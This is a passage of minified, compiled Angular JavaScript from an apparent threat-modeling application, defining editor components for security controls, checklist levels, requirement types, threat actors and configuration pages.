Wg?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteControl(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let te=this.dataService.Config.CreateControl(T);te.CopyFrom(d.Data),te.Name=te.Name+"-Copy",this.dataService.Config.GetControlGroups().find(pe=>pe.Controls.includes(d)).AddControl(te),this.createNodes(),this.selectedNode=this.FindNodeOfObject(te),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.controlIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.controlIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=k),onMoveToGroup:te=>{let pe="controlIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return Y},n=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.Control")],onAdd:te=>{let pe=null;pe=te==this.translate.instant("general.Group")?this.dataService.Config.CreateControlGroup(d):this.dataService.Config.CreateControl(d),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(pe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteControlGroup(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.controlGroupIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,c.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.controlGroupIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,c.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=Y&&te!=k),onMoveToGroup:te=>{let pe="controlGroupIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return d.SubGroups.forEach(te=>{let pe=n(te,d,Y,q);Y.children.push(pe)}),d.Controls.forEach(te=>Y.children.push(i(te,d,Y,q))),q.push(Y),Y},c=n(this.dataService.Config.ControlLibrary,null,null,[]);c.icon="security",c.canSelect=!1,c.canDelete=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-controls"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"node","control",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"node","control"]],template:function(e,i){1&e&&ne(0,Gft,9,3,"div",0),2&e&&F("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,nn,un,Go,Xa,T2,Xi]}),t})();const Qft=["reqNavTree"];function $ft(t,a){if(1&t&&(m(0,"div",23),s(1),u()),2&t){const e=V().$implicit;g(1),ke(e.Abbr)}}function Kft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",20),he("click",function(){const r=be(e).$implicit;return Me(V(4).selectedLevel=r)}),s(1,"\n "),m(2,"mat-icon",21),s(3,"arrow_right"),u(),s(4,"\n "),ne(5,$ft,2,1,"div",22),s(6,"\n "),m(7,"div",23),s(8),u(),s(9,"\n "),m(10,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(4).DeleteLevel(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);Ct("highlight-light",i.selectedLevel===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedLevel===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(5),F("ngIf",e.Abbr),g(3),ke(e.Name),g(2),at("matTooltip",re(11,8,"general.Delete"))}}function Xft(t,a){if(1&t){const e=Ye();m(0,"button",30),he("click",function(){return be(e),Me(V(5).selectedLevel.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Yft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",25),s(3,"\n "),m(4,"mat-form-field",26),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"input",27),he("ngModelChange",function(n){return be(e),Me(V(4).selectedLevel.Name=n)}),u(),s(11,"\n "),ne(12,Xft,6,3,"button",28),s(13,"\n "),u(),s(14,"\n "),it(15,"br"),s(16,"\n "),m(17,"mat-form-field",26),s(18,"\n "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n "),m(23,"input",27),he("ngModelChange",function(n){return be(e),Me(V(4).selectedLevel.Abbr=n)}),u(),s(24,"\n "),u(),s(25,"\n "),it(26,"br"),s(27,"\n "),m(28,"mat-form-field",3),s(29,"\n "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n "),m(34,"textarea",29),he("ngModelChange",function(n){return be(e),Me(V(4).selectedLevel.Description=n)}),u(),s(35,"\n "),u(),s(36,"\n "),u(),s(37,"\n "),Mt()}if(2&t){const e=V(4);g(7),ke(re(8,13,"general.Name")),g(3),at("matTooltip",e.selectedLevel.Name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Name),g(2),F("ngIf",e.selectedLevel.Name),g(8),ke(re(21,15,"properties.Abbr")),g(3),at("matTooltip",e.selectedLevel.Abbr),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Abbr),g(8),ke(re(32,17,"properties.Description")),g(3),at("matTooltip",e.selectedLevel.Description),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Description)}}function Jft(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",13),s(2,"\n "),m(3,"div",14),s(4,"\n "),m(5,"mat-list",15),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.drop(n,r.selectedChecklistType.Levels))}),s(6,"\n "),m(7,"div",16),s(8),oe(9,"translate"),m(10,"button",17),he("click",function(){return be(e),Me(V(3).AddLevel())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,Kft,15,10,"mat-list-item",18),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"div",19),s(20,"\n "),ne(21,Yft,38,19,"ng-container",2),s(22,"\n "),u(),s(23,"\n "),u(),s(24,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedChecklistType.Name," ",re(9,9,"properties.Levels")," "),g(2),at("matTooltip",re(11,11,"general.Add")),g(5),F("ngForOf",e.selectedChecklistType.Levels),g(6),F("ngIf",e.selectedLevel&&e.selectedChecklistType.Levels.includes(e.selectedLevel))}}function Zft(t,a){if(1&t&&(m(0,"td",34),s(1),u()),2&t){const e=a.$implicit;g(1),ke(e.Abbr)}}function ept(t,a){if(1&t){const e=Ye();m(0,"td",34)(1,"mat-checkbox",35),he("ngModelChange",function(n){const c=be(e).index;return Me(V(4).selectedRequirementType.RequiredPerLevel[c]=n)})("change",function(n){const c=be(e).index;return Me(V(4).OnRequiredChanged(n,c))}),u()()}if(2&t){const e=a.index,i=V(4);g(1),F("ngModel",i.selectedRequirementType.RequiredPerLevel[e])}}function tpt(t,a){if(1&t&&(m(0,"mat-option",36),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ct("\n ",re(2,2,i.GetReqFulfillRuleTypeName(e)),"\n ")}}function ipt(t,a){if(1&t&&(m(0,"mat-option",36),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ct("\n ",e.Name,"\n ")}}function apt(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function npt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function opt(t,a){if(1&t&&(m(0,"mat-option",36),s(1,"\n "),ne(2,apt,3,3,"ng-container",2),s(3,"\n "),ne(4,npt,2,1,"ng-container",2),s(5,"\n "),u()),2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function rpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",39),he("click",function(){be(e);const n=V(6);return Me(n.OnNextComparisonType(n.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest))}),s(3),u(),s(4,"\n "),m(5,"mat-checkbox",40),he("ngModelChange",function(n){return be(e),Me(V(6).selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.Value=n)}),u(),s(6,"\n "),it(7,"br"),s(8,"\n "),m(9,"mat-checkbox",41),he("ngModelChange",function(n){return be(e),Me(V(6).selectedRequirementType.ReqFulfillRule.NeedsReview=n)}),s(10),oe(11,"translate"),u(),s(12,"\n "),Mt()}if(2&t){const e=V(6);g(3),ct("\n ",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ComparisonType,"\n "),g(2),F("ngModel",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.Value),g(4),F("ngModel",e.selectedRequirementType.ReqFulfillRule.NeedsReview),g(1),ke(re(11,4,"properties.NeedsReview"))}}function spt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),it(2,"br"),s(3,"\n "),m(4,"mat-form-field",26),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-select",38),he("valueChange",function(n){return be(e),Me(V(5).selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID=n)}),s(11,"\n "),ne(12,opt,6,3,"mat-option",33),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n "),ne(16,rpt,13,6,"ng-container",2),s(17,"\n "),Mt()}if(2&t){const e=V(5);g(7),ke(re(8,4,"general.PropertyName")),g(3),F("value",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID),g(2),F("ngForOf",e.GetAvailableProperties()),g(4),F("ngIf",(null==e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest||null==e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID?null:e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID.length)>0)}}function cpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",37),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",38),he("valueChange",function(n){return be(e),Me(V(4).selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID=n)}),s(9,"\n "),ne(10,ipt,2,2,"mat-option",33),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),ne(14,spt,18,6,"ng-container",2),s(15,"\n "),Mt()}if(2&t){const e=V(4);g(5),ke(re(6,4,"properties.ComponentType")),g(3),F("value",e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID),g(2),F("ngForOf",e.GetMyComponentSWTypes()),g(4),F("ngIf",(null==e.selectedRequirementType.ReqFulfillRule.SWRule||null==e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID?null:e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID.length)>0)}}function lpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",25),s(3,"\n "),m(4,"h2"),s(5),u(),s(6,"\n "),m(7,"mat-form-field",3),s(8,"\n "),m(9,"mat-label"),s(10),oe(11,"translate"),u(),s(12,"\n "),m(13,"textarea",4),he("ngModelChange",function(n){return be(e),Me(V(3).selectedRequirementType.Description=n)}),u(),s(14,"\n "),u(),s(15,"\n "),m(16,"table"),s(17,"\n "),m(18,"tr"),s(19,"\n "),it(20,"td"),s(21,"\n "),ne(22,Zft,2,1,"td",31),s(23,"\n "),u(),s(24,"\n "),m(25,"tr"),s(26,"\n "),m(27,"td"),s(28),oe(29,"translate"),u(),s(30,"\n "),ne(31,ept,2,1,"td",31),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n "),it(35,"br"),s(36,"\n "),m(37,"mat-form-field",26),s(38,"\n "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n "),m(43,"mat-select",32),he("valueChange",function(n){return be(e),Me(V(3).selectedRequirementType.ReqFulfillRule.RuleType=n)})("selectionChange",function(n){return be(e),Me(V(3).OnReqRuleTypeChanged(n))}),s(44,"\n "),m(45,"mat-option"),s(46),oe(47,"translate"),u(),s(48,"\n "),ne(49,tpt,3,4,"mat-option",33),s(50,"\n "),u(),s(51,"\n "),u(),s(52,"\n "),ne(53,cpt,16,6,"ng-container",2),s(54,"\n "),u(),s(55,"\n "),Mt()}if(2&t){const e=V(3);g(5),ke(e.selectedRequirementNode.name()),g(5),ke(re(11,12,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedRequirementType.Description),g(9),F("ngForOf",e.selectedChecklistType.Levels),g(6),ke(re(29,14,"general.Required")),g(3),F("ngForOf",e.selectedChecklistType.Levels),g(9),ke(re(41,16,"properties.ReqFulfillRuleType")),g(3),F("value",e.selectedRequirementType.ReqFulfillRule.RuleType),g(3),ke(re(47,18,"properties.selectNone")),g(3),F("ngForOf",e.GetReqFulfillRuleTypes()),g(4),F("ngIf",1==e.selectedRequirementType.ReqFulfillRule.RuleType)}}function dpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",3),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",4),he("ngModelChange",function(n){return be(e),Me(V(2).selectedChecklistType.Description=n)}),u(),s(9,"\n "),u(),s(10,"\n \n "),m(11,"mat-tab-group",5),he("selectedIndexChange",function(n){return be(e),Me(V(2).SetSelectedTabIndex(n))}),s(12,"\n "),m(13,"mat-tab",6),oe(14,"translate"),s(15,"\n "),ne(16,Jft,25,13,"ng-template",7),s(17,"\n "),u(),s(18,"\n "),m(19,"mat-tab",6),oe(20,"translate"),s(21,"\n "),m(22,"as-split",8),he("dragEnd",function(n){return be(e),Me(V(2).OnSplitSizeChange(n,0))}),s(23,"\n "),m(24,"as-split-area",9),s(25,"\n "),m(26,"app-nav-tree",10,11),he("selectedNodeChanged",function(n){return be(e),Me(V(2).selectedRequirementNode=n)}),u(),s(28,"\n "),u(),s(29,"\n "),m(30,"as-split-area",12),s(31,"\n "),ne(32,lpt,56,20,"ng-container",2),s(33,"\n "),u(),s(34,"\n "),u(),s(35,"\n "),u(),s(36,"\n "),u(),s(37,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,22,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedChecklistType.Description),g(3),F("selectedIndex",e.GetSelectedTabIndex()),g(2),at("label",re(14,24,"general.Settings")),g(6),at("label",re(20,26,"general.Requirements")),g(3),F("gutterSize",3)("restrictMove",!0),g(2),Ct("splitter-light2",!e.theme.IsDarkMode)("splitter-dark2",e.theme.IsDarkMode),F("size",e.GetSplitSize(0,0,300))("order",1),g(2),F("activeNode",e.selectedRequirementNode),g(4),Ct("bg-color-light3",!e.theme.IsDarkMode)("bg-color-dark3",e.theme.IsDarkMode),F("size",e.GetSplitSize(0,1,"*"))("order",2),g(2),F("ngIf",e.selectedRequirementType)}}function mpt(t,a){if(1&t&&(m(0,"div",1),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,dpt,38,28,"ng-container",2),s(6,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.selectedChecklistType)}}let upt=(()=>{class t extends xa{constructor(e,i,n,r,c){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.componentProperties={},i.ConfigChanged.subscribe(d=>this.createNodes())}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedLevel=null,this.selectedRequirementNode=null,setTimeout(()=>{this.createRequirementNodes()},100)}get selectedChecklistType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get selectedRequirementNode(){return this._selectedRequirementNode}set selectedRequirementNode(e){this._selectedRequirementNode=e,this.selectedRequirementType=null==e?void 0:e.data}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}AddLevel(){this.selectedChecklistType.Levels.push({Name:Gi.FindUniqueName("Level",this.selectedChecklistType.Levels.map(e=>e.Name)),Abbr:"",Description:""})}DeleteLevel(e){const i=this.selectedChecklistType.Levels.findIndex(n=>n.Name==e.Name&&n.Abbr==e.Abbr);i>=0&&this.selectedChecklistType.Levels.splice(i,1)}OnRequiredChanged(e,i){if(e.checked)for(let n=i+1;n{let d={name:()=>r.Name,canSelect:!0,data:r,canAdd:!1,canRename:!0,onRename:T=>{r.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(T=>{T&&(this.dataService.Config.DeleteChecklistType(r),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetChecklistTypes();if(0!=T.findIndex(k=>k.ID==r.ID)){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k-1,1)[0]),c.children.splice(k,0,c.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetChecklistTypes();if(T.findIndex(k=>k.ID==r.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k+1,1)[0]),c.children.splice(k,0,c.children.splice(k+1,1)[0])}}};return d},n={name:()=>this.translate.instant("general.Checklists"),canSelect:!1,icon:"fact_check",canAdd:!0,hasMenu:!0,onAdd:()=>{let r=this.dataService.Config.CreateChecklistType();this.createNodes(),this.selectedNode=this.FindNodeOfObject(r),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetChecklistTypes().forEach(r=>{let c=i(r,n);n.children.push(c)}),this.Nodes.push(n),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}createRequirementNodes(){var e;const i=this.reqNodes;this.reqNodes=[];let n=(c,d)=>{let T={name:()=>c.Name,canSelect:!0,data:c,canAdd:!0,onAdd:()=>{let k=this.dataService.Config.CreateRequirementType();c.AddSubRequirementType(k),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(k),this.selectedRequirementNode.isRenaming=!0},canRename:!0,onRename:k=>{c.Name=k},canDuplicate:!0,onDuplicate:()=>{let k=this.dataService.Config.CreateRequirementType();k.CopyFrom(c.Data),k.Name=k.Name+"-Copy",d.data instanceof Jg?d.data.AddRequirementType(k):d.data instanceof Yg&&d.data.AddSubRequirementType(k),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(k),this.selectedRequirementNode.isRenaming=!0},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(k=>{k&&(this.dataService.Config.DeleteRequirementType(c),this.selectedNode==T&&(this.selectedNode=null),this.createRequirementNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let k=[];if(d.data instanceof Jg?k=d.data.Data.requirementTypeIDs:d.data instanceof Yg&&(k=d.data.Data.subReqTypeIDs),0!=k.findIndex(q=>q==c.ID)){let q=k.findIndex(Y=>Y==c.ID);k.splice(q,0,k.splice(q-1,1)[0]),d.children.splice(q,0,d.children.splice(q-1,1)[0])}},onMoveDown:()=>{let k=[];if(d.data instanceof Jg?k=d.data.Data.requirementTypeIDs:d.data instanceof Yg&&(k=d.data.Data.subReqTypeIDs),k.findIndex(q=>q==c.ID)!=k.length-1){let q=k.findIndex(Y=>Y==c.ID);k.splice(q,0,k.splice(q+1,1)[0]),r.children.splice(q,0,r.children.splice(q+1,1)[0])}}};return c.SubReqTypes.forEach(k=>T.children.push(n(k,T))),T},r={name:()=>this.translate.instant("general.Requirements"),canSelect:!1,icon:"check_circle_outline",data:this.selectedChecklistType,canAdd:!0,hasMenu:!0,onAdd:()=>{let c=this.dataService.Config.CreateRequirementType();this.selectedChecklistType.AddRequirementType(c),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(c),this.selectedRequirementNode.isRenaming=!0},children:[]};this.selectedChecklistType&&(this.selectedChecklistType.RequirementTypes.forEach(c=>{let d=n(c,r);r.children.push(d)}),this.reqNodes.push(r),xa.TransferExpandedState(i,this.reqNodes),null===(e=this.reqNavTree)||void 0===e||e.SetNavTreeData(this.reqNodes))}ReqFindNodeOfObject(e){return this.reqFindNodeOfObjectRec(e,this.reqNodes)}reqFindNodeOfObjectRec(e,i){for(let n=0;n{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-actor"]],inputs:{threatActor:"threatActor"},decls:1,vars:1,consts:[["style","margin-left: 10px; margin-top: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-top","10px"],[3,"showTimestamp","hasCheckbox","strings"],["appearance","fill",1,"property-form-field"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"]],template:function(e,i){1&e&&ne(0,fpt,20,17,"div",0),2&e&&F("ngIf",i.threatActor)},dependencies:[Zi,Ri,nn,un,Nr,yr,jp,Xi]}),t})();function ppt(t,a){if(1&t&&(m(0,"div",1),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),it(5,"app-threat-actor",2),s(6,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("threatActor",e.selectedThreatActor)}}let _pt=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r}get selectedThreatActor(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Gp?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(r,c)=>{let d={name:()=>r.Name,canSelect:!0,data:r,canRename:!0,onRename:T=>{r.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(T=>{T&&(this.dataService.Config.DeleteThreatActor(r),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetThreatActors();if(0!=T.findIndex(k=>k.ID==r.ID)){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k-1,1)[0]),c.children.splice(k,0,c.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetThreatActors();if(T.findIndex(k=>k.ID==r.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k+1,1)[0]),c.children.splice(k,0,c.children.splice(k+1,1)[0])}}};return d},n={name:()=>this.translate.instant("general.ThreatSources"),canSelect:!1,canAdd:!0,hasMenu:!0,icon:"portrait",onAdd:()=>{let r=this.dataService.Config.CreateThreatActor();this.createNodes(),this.selectedNode=this.FindNodeOfObject(r),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetThreatActors().forEach(r=>n.children.push(i(r,n))),this.Nodes.push(n),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-sources"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[3,"threatActor"]],template:function(e,i){1&e&&ne(0,ppt,7,2,"div",0),2&e&&F("ngIf",i.selectedNode)},dependencies:[Ri,DZ],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();function gpt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"view_module"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.Stencils"),"\n "))}function Cpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-stencils",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}function ypt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"code"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.SoftwareComponents"),"\n "))}function bpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-components",14),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)("componentType",1)}}function Mpt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"policy"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.ProcessComponents"),"\n "))}function vpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-components",14),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)("componentType",2)}}function Apt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"portrait"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.ThreatSources"),"\n "))}function Tpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-threat-sources",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}function Ept(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"flash_on"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.ThreatCategories"),"\n "))}function Dpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-threat-categories",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}function xpt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"library_books"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.ThreatLibrary"),"\n "))}function wpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-threat-library",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}function Ipt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"rule"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"pages.config.CPDFDRules"),"\n "))}function Rpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-rules",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}function Spt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"security"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"general.Controls"),"\n "))}function kpt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-controls",13),he("nodeTreeChanged",function(n){return be(e),Me(V().SetNavTreeData(n))}),u(),s(2,"\n ")}if(2&t){const e=V();g(1),F("selectedNode",e.selectedNode)}}function Ppt(t,a){1&t&&(s(0,"\n "),m(1,"mat-icon",12),s(2,"account_balance"),u(),s(3),oe(4,"translate")),2&t&&(g(3),ct("\n ",re(4,1,"general.Assets"),"\n "))}function Opt(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"app-assets",15),he("nodeTreeChanged",function(n){return 